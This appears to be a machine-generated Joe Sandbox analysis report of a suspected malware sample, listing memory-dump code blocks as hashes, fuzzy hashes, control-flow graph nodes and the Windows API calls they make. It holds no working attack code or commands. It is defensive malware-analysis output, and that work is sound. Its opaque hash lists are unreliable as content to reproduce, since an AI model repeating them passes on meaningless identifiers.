                                                                                                                • Opcode ID: a358b47ece68b32c02a01991e4bf65333b7a564d8ce4533787ddcdb95b878963
                                                                                                                • Instruction ID: f9d019da1fb608413857ace2b7e416ab4eeeb1b1664db83013a6a646e84f1df7
                                                                                                                • Opcode Fuzzy Hash: a358b47ece68b32c02a01991e4bf65333b7a564d8ce4533787ddcdb95b878963
                                                                                                                • Instruction Fuzzy Hash: E8D1B178E00218CFEB14DFA5C994B9DBBB2BF89305F1081A9D909AB355DB355E82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f97b4e3fb2a17b3943ae6aec6427b0340dd82132352aff3a408bc66ef6e781c8
                                                                                                                • Instruction ID: 87c6a3f66f40967b24e6e9f2f72dafe5f9995f0396a4b017552193b40d0de86b
                                                                                                                • Opcode Fuzzy Hash: f97b4e3fb2a17b3943ae6aec6427b0340dd82132352aff3a408bc66ef6e781c8
                                                                                                                • Instruction Fuzzy Hash: 60A1D574D00208CFEB14DFA9C944B9DBBB2FF89314F2082A9E448AB391DB759985CF55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5aae76217d23b517cefadfad69352293ff268bae0d3a10fa57361a1123bca322
                                                                                                                • Instruction ID: 9aa71fe58559904582ee9a90559040479690c10e0a8415d90604eb5eab4c825a
                                                                                                                • Opcode Fuzzy Hash: 5aae76217d23b517cefadfad69352293ff268bae0d3a10fa57361a1123bca322
                                                                                                                • Instruction Fuzzy Hash: 65A1E474D00208CFEB14DFA9C944B9DBBB2FF89314F208269E448AB391DB759985CF55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fabe921bb5c3522ea6299e2ccfa4eedee36d330b10b67436ef81137fb2ae2d81
                                                                                                                • Instruction ID: b42a0e56ba9e26c2b84e30b144a243a194078d9f1523ee8dd0957a6aa5fac253
                                                                                                                • Opcode Fuzzy Hash: fabe921bb5c3522ea6299e2ccfa4eedee36d330b10b67436ef81137fb2ae2d81
                                                                                                                • Instruction Fuzzy Hash: 10A192B4E01218CFEB14CF6AC944B9DFBF2AB89300F14C1AAD448A7255DB745A85CF61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c076c44688ccfeee440531b2ad5701f02abfd052c1d0856feb5238d682ca2f8
                                                                                                                • Instruction ID: b1e1e220460aa7da9a29ad4b66056b97b84e5454e7c1bad94aeb0f71b7c80f39
                                                                                                                • Opcode Fuzzy Hash: 1c076c44688ccfeee440531b2ad5701f02abfd052c1d0856feb5238d682ca2f8
                                                                                                                • Instruction Fuzzy Hash: B8A181B4E01218CFEB54CF6AC944B9DBBF2AF89300F14C1AAD449B7255DB745A85CF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4d50c18525d1eaf9800db818083d83529c9697eaed21b14657fe4a6147221d5f
                                                                                                                • Instruction ID: 154c8dc581dbe9b6a29c57ae166715e88d3483ee9bbad3f9ef1135e7e91d79da
                                                                                                                • Opcode Fuzzy Hash: 4d50c18525d1eaf9800db818083d83529c9697eaed21b14657fe4a6147221d5f
                                                                                                                • Instruction Fuzzy Hash: E4A192B4E012288FEB64CF6AC944B9DBBF2AF89300F14C1AAD549B7255DB345A85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08fa7fadb17547e155bfde50bc368f5ab7f6a40e11a49cbd02745e92ffb53bb1
                                                                                                                • Instruction ID: be583f8a99b139ddb0d832f8c6a98f029185999097820d68a6c3f2844b9a99f6
                                                                                                                • Opcode Fuzzy Hash: 08fa7fadb17547e155bfde50bc368f5ab7f6a40e11a49cbd02745e92ffb53bb1
                                                                                                                • Instruction Fuzzy Hash: 97A18474E01218CFEB54CF6AC944B9DBBF2BB89300F14C1AAD448B7255DB349A85CF21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1610f202a49d91e129c7746f36339377172dd833581fb67f745826979b7bfa7e
                                                                                                                • Instruction ID: fd08f4d12c38380ec6ed4d63d58cbfce2c565d1b756051d75af3e3e275db4080
                                                                                                                • Opcode Fuzzy Hash: 1610f202a49d91e129c7746f36339377172dd833581fb67f745826979b7bfa7e
                                                                                                                • Instruction Fuzzy Hash: B991E374D00208CFEB10DFA9C988B9CBBB1FF49314F2092A9E449AB391DB759985CF55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cde69abc4f8bd15fa30ffd6d900efe78077da8ad8f20842d873621dc1434ec83
                                                                                                                • Instruction ID: 728f78bfc28b3e58c1e7e01d65c26e634a59cfe2d2f2bdfb7b0a9704cbe3d7f7
                                                                                                                • Opcode Fuzzy Hash: cde69abc4f8bd15fa30ffd6d900efe78077da8ad8f20842d873621dc1434ec83
                                                                                                                • Instruction Fuzzy Hash: 6981C574E00248CFEB15DFE9C98069DBBF2FF88310F248569D858AB759DB359942CB60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a567ba7e83e64780fbafe3b8179869f105f45631c248a2df2402685e6ba8630
                                                                                                                • Instruction ID: 5313c9b50c0d7fbbe2019dea900a4b58fd15046de3aba2cc728d7081112aa756
                                                                                                                • Opcode Fuzzy Hash: 7a567ba7e83e64780fbafe3b8179869f105f45631c248a2df2402685e6ba8630
                                                                                                                • Instruction Fuzzy Hash: 1B81B474E00248CBEB15DFEAD94069DBBF2FF88310F248529D858AB759DB359942CB60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709257271.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_150000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4dbdcdd8575d129b56d3f8dfceda67dc4e87336ac730740e1a04d27a3af6d01b
                                                                                                                • Instruction ID: 6d52f54de010ebbf22a7defe9f8351c47915e6886c6f2ae59efc6a0ad570761b
                                                                                                                • Opcode Fuzzy Hash: 4dbdcdd8575d129b56d3f8dfceda67dc4e87336ac730740e1a04d27a3af6d01b
                                                                                                                • Instruction Fuzzy Hash: BB81B674E00218DFEB18DFA9D844A9DBBF2BF88305F14C069E819AB365DB309985DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 78c0c5602ba1b934e7cc808b94dfa3ee83a5c3836e9f863eea385957b2dc401a
                                                                                                                • Instruction ID: cc930cf0ea65aa3d29658a0cda08d0065d3b2482ba5bf4b3fe62d16a5b1a325f
                                                                                                                • Opcode Fuzzy Hash: 78c0c5602ba1b934e7cc808b94dfa3ee83a5c3836e9f863eea385957b2dc401a
                                                                                                                • Instruction Fuzzy Hash: A971C375D01228CFDB69DF66C9847DDBBB2BF89340F1091AAD809A7350DB359A82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8992108f4dbbf74c08358f95706a72cebed94869e50f203dbaa6076edfc4fe26
                                                                                                                • Instruction ID: 4b2ebf756fa425f58852c34e97927b0a2bb7ea8a7b15da77447c794df1e42fd4
                                                                                                                • Opcode Fuzzy Hash: 8992108f4dbbf74c08358f95706a72cebed94869e50f203dbaa6076edfc4fe26
                                                                                                                • Instruction Fuzzy Hash: 307195B5E01628CFEB68CF66C944B9DBBF2AF89300F14C1AAD40DA7255DB345A85CF11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99721cb368a7ecd00721f35ff210230a457cfd3cb18cb4cc40fbc9a7ec0bb79a
                                                                                                                • Instruction ID: 216acbeac6a7c83e46ed422857655cd9fa169972a673a8201a1fc0f51d14911c
                                                                                                                • Opcode Fuzzy Hash: 99721cb368a7ecd00721f35ff210230a457cfd3cb18cb4cc40fbc9a7ec0bb79a
                                                                                                                • Instruction Fuzzy Hash: 6C7193B4D016188FEB68CF6AC944B9DBBF2AF89200F14C1AAD40DA7255DB345A86CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709257271.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_150000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 105c2d6a1d1105aa762b0beb61ba11fc1a89d909ac520bb3e79443b9246eaaeb
                                                                                                                • Instruction ID: ca4ba36147a8230ceb1fe87d1d06a3d14979f220c36d6870443c356e288615d4
                                                                                                                • Opcode Fuzzy Hash: 105c2d6a1d1105aa762b0beb61ba11fc1a89d909ac520bb3e79443b9246eaaeb
                                                                                                                • Instruction Fuzzy Hash: 0B61E974E00248DFDB18CFAAD844A9DBBF2BF89301F14C06AE815AB365DB345846DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 35c77ba032fc429162a1fd0c7a0ec2815ef81fa7e06b4e85e8d93c24195a9312
                                                                                                                • Instruction ID: 25af9f5ab58903ec2a7c7238ec514206f0172d0736529e67827a02678050d3ff
                                                                                                                • Opcode Fuzzy Hash: 35c77ba032fc429162a1fd0c7a0ec2815ef81fa7e06b4e85e8d93c24195a9312
                                                                                                                • Instruction Fuzzy Hash: 4761D634E00258EFEB25DF64C854BADBB77EB88341F5085AA9A0A77354CB315D82EF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0d8a2f2d8adb64031fadf131485b733e4aea4a6aeabe0d6d71df0c4cb2d3d64e
                                                                                                                • Instruction ID: 7151a9858864fa59da90122cafc4c3e1b818d0e852035d00702ed1731727e046
                                                                                                                • Opcode Fuzzy Hash: 0d8a2f2d8adb64031fadf131485b733e4aea4a6aeabe0d6d71df0c4cb2d3d64e
                                                                                                                • Instruction Fuzzy Hash: C1417AB1E016189FEB58CF6BC944789FAF3AFC9200F14C1AAC54CA7264DB7409868F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c67febe8266a3b1d7461b83adeb3503f88fa356511727ffcc9b47819cf8ffd44
                                                                                                                • Instruction ID: f6f70c8aaf29b8179893ed64bd0efdee6853dfbe3a8494cabc5523af43650a53
                                                                                                                • Opcode Fuzzy Hash: c67febe8266a3b1d7461b83adeb3503f88fa356511727ffcc9b47819cf8ffd44
                                                                                                                • Instruction Fuzzy Hash: 084178B1D016189BEB58CF6BC9447CAFAF3AFC9200F14C0AAD54CA7264DB740A868F51

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 389E09FE
                                                                                                                • GetCurrentThread.KERNEL32 ref: 389E0A3B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 389E0A78
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 389E0AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: f5fb5785c16f6d19f393d6817592027506ebe8edb96e75c4d81a3ac3d11b12f4
                                                                                                                • Instruction ID: 272ee36a777eab00bb45cede09fbed954d7c00dec129c1cf02324978fedf096c
                                                                                                                • Opcode Fuzzy Hash: f5fb5785c16f6d19f393d6817592027506ebe8edb96e75c4d81a3ac3d11b12f4
                                                                                                                • Instruction Fuzzy Hash: 695135B090034ACFDB14DFAAC548B9EBFF1BF88310F208459E459A7261DB74A941CF65

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 389E09FE
                                                                                                                • GetCurrentThread.KERNEL32 ref: 389E0A3B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 389E0A78
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 389E0AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 68faf0d224a0898529bb1197e7e4b99193fb32d200f14b96d1364831ca08a573
                                                                                                                • Instruction ID: 0afbaf1eefd949843420800faeb3a0559ee954c9e87c314dff68dc25b21bd43b
                                                                                                                • Opcode Fuzzy Hash: 68faf0d224a0898529bb1197e7e4b99193fb32d200f14b96d1364831ca08a573
                                                                                                                • Instruction Fuzzy Hash: 615124B090030ACFDB14DFAAC548B9EBBF6BF88310F208459E459A7261DB74A940CF65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 483 389e01c8-389e0232 CreateWindowExW 485 389e023b-389e0273 483->485 486 389e0234-389e023a 483->486 490 389e0275-389e0278 485->490 491 389e0280 485->491 486->485 490->491 492 389e0281 491->492 492->492
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,0000000C,?,?,?), ref: 389E0222
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 716092398-4108050209
                                                                                                                • Opcode ID: d8f9cc20f2f7ddfda23b061979e9aacea21effd42249c6a3198f8cb5074a444c
                                                                                                                • Instruction ID: 70dd40d976e13e686ad0301c86a324e35fdbedb50d33aefa31659d2a0a0d78b4
                                                                                                                • Opcode Fuzzy Hash: d8f9cc20f2f7ddfda23b061979e9aacea21effd42249c6a3198f8cb5074a444c
                                                                                                                • Instruction Fuzzy Hash: A921A275800249EFDF11DF94D894ADDBFB5BF48314F218149F9146B260C775A855CF60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 493 150b29-150b4a 494 150b51-150ba6 call 1507b4 493->494 495 150b4c 493->495 503 150bab 494->503 495->494 564 150bae call 150ed8 503->564 565 150bae call 150ec8 503->565 504 150bb4-150c7b call 1507b4 * 4 525 150c86-150c94 504->525 526 150c9d-150ca6 525->526 527 150cae-150cb7 526->527 559 150cba call 1517b8 527->559 560 150cba call 1517d8 527->560 528 150cc0-150cea call 1519c4 call 152c88 call 153168 531 150cf0-150d05 528->531 533 150d0e-150d17 531->533 557 150d1a call 154329 533->557 558 150d1a call 154348 533->558 534 150d20-150e88 557->534 558->534 559->528 560->528 564->504 565->504
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709257271.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_150000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: P*m5$t"m5
                                                                                                                • API String ID: 0-789474613
                                                                                                                • Opcode ID: dfbe67e0358b2fbf6cb878bb538c289542488816fb915bc3ea5bbf82ea7b6bab
                                                                                                                • Instruction ID: c7dbb822df9a0431513bd69452070c0cb848f57dbd2390b462a49011ba3c9924
                                                                                                                • Opcode Fuzzy Hash: dfbe67e0358b2fbf6cb878bb538c289542488816fb915bc3ea5bbf82ea7b6bab
                                                                                                                • Instruction Fuzzy Hash: 07A1A774E00319DFDB04DFA8D99499DBBB3FB89341B104629EA16BB265DB306D46CF80

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 566 150b30-150b4a 567 150b51-150bab call 1507b4 566->567 568 150b4c 566->568 635 150bae call 150ed8 567->635 636 150bae call 150ec8 567->636 568->567 577 150bb4-150cb7 call 1507b4 * 4 630 150cba call 1517b8 577->630 631 150cba call 1517d8 577->631 601 150cc0-150d17 call 1519c4 call 152c88 call 153168 637 150d1a call 154329 601->637 638 150d1a call 154348 601->638 607 150d20-150e88 630->601 631->601 635->577 636->577 637->607 638->607
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709257271.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_150000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: P*m5$t"m5
                                                                                                                • API String ID: 0-789474613
                                                                                                                • Opcode ID: 48ba71566cbe14c5f1ea6b6aa498e0fc386bb174d5888401daee636cb4ffc0f3
                                                                                                                • Instruction ID: bd44aa67aa20066bc26c0f544ca5aec511b1cb1be81ae74764751d9b72be8034
                                                                                                                • Opcode Fuzzy Hash: 48ba71566cbe14c5f1ea6b6aa498e0fc386bb174d5888401daee636cb4ffc0f3
                                                                                                                • Instruction Fuzzy Hash: D2A1A774E00319DFDB04DFA8D98499DBBB7FB89341B104625EA16BB265DB306D46CF80

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1193 389e1dc0-389e1dfc 1194 389e1eac-389e1ecc 1193->1194 1195 389e1e02-389e1e07 1193->1195 1201 389e1ecf-389e1edc 1194->1201 1196 389e1e5a-389e1e92 CallWindowProcW 1195->1196 1197 389e1e09-389e1e40 1195->1197 1198 389e1e9b-389e1eaa 1196->1198 1199 389e1e94-389e1e9a 1196->1199 1203 389e1e49-389e1e58 1197->1203 1204 389e1e42-389e1e48 1197->1204 1198->1201 1199->1198 1203->1201 1204->1203
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 389E1E81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: 75b0e1780ddb4b85e2cbb9885b10a4e8467513336e13bedf394bcd0e330a97e3
                                                                                                                • Instruction ID: 1a51f820cf80382991ce4cb8406ba0ffcf4d69379a41e636258001395b004d77
                                                                                                                • Opcode Fuzzy Hash: 75b0e1780ddb4b85e2cbb9885b10a4e8467513336e13bedf394bcd0e330a97e3
                                                                                                                • Instruction Fuzzy Hash: 644125B8900309DFDB15DF99C484A9AFBF5FF88315F24845DE519AB321C734A841CBA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1207 389e0bc0-389e0c5c DuplicateHandle 1208 389e0c5e-389e0c64 1207->1208 1209 389e0c65-389e0c82 1207->1209 1208->1209
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 389E0C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 5ccf2a7a6a54d30216130a7f7f161c241dddeb4654cc36fdccff2958b33cd0cc
                                                                                                                • Instruction ID: c381441133ca4820a83ccd8aab6334a728cc63ea07a12d03f93b4afb31f56357
                                                                                                                • Opcode Fuzzy Hash: 5ccf2a7a6a54d30216130a7f7f161c241dddeb4654cc36fdccff2958b33cd0cc
                                                                                                                • Instruction Fuzzy Hash: 7021E3B59003499FDB10CFAAD984AEEBFF5FB48710F24841AE959A3310C378A951DF61

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1212 389e0bc8-389e0c5c DuplicateHandle 1213 389e0c5e-389e0c64 1212->1213 1214 389e0c65-389e0c82 1212->1214 1213->1214
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 389E0C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: a39c2e1f80ddfe43b6c8c619d9ea9e5600cc65ea366ed8dab9668e158759d505
                                                                                                                • Instruction ID: 5665bee401ad32ce30104cb759bad444ce4e3739f74508df0229eb505c261c15
                                                                                                                • Opcode Fuzzy Hash: a39c2e1f80ddfe43b6c8c619d9ea9e5600cc65ea366ed8dab9668e158759d505
                                                                                                                • Instruction Fuzzy Hash: E721E4B59003099FDB10CFAAD984ADEBFF9FB48720F14801AE958A3310D378A950CF65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1229 389e2018-389e208a SetTimer 1231 389e208c-389e2092 1229->1231 1232 389e2093-389e20a7 1229->1232 1231->1232
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2870079774-0
                                                                                                                • Opcode ID: 292f44b7d2499bec6881d45b574855e7158a318fbdfa321120ce1f23823cb877
                                                                                                                • Instruction ID: df4fde01e4bedfb8283167700a5fd92c2953ad6ab3dd85e4021fc2372a8937e6
                                                                                                                • Opcode Fuzzy Hash: 292f44b7d2499bec6881d45b574855e7158a318fbdfa321120ce1f23823cb877
                                                                                                                • Instruction Fuzzy Hash: 661125B58003499FDB11DF9AD884BDEBFF8EB49320F108459E459A7240C375A584CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1234 389ec560-389ed452 OleInitialize 1236 389ed45b-389ed478 1234->1236 1237 389ed454-389ed45a 1234->1237 1237->1236
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 389ED445
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 46c928f0bcd18f807bcfc73687e49db7ed7decde489251adecb2ef8165992557
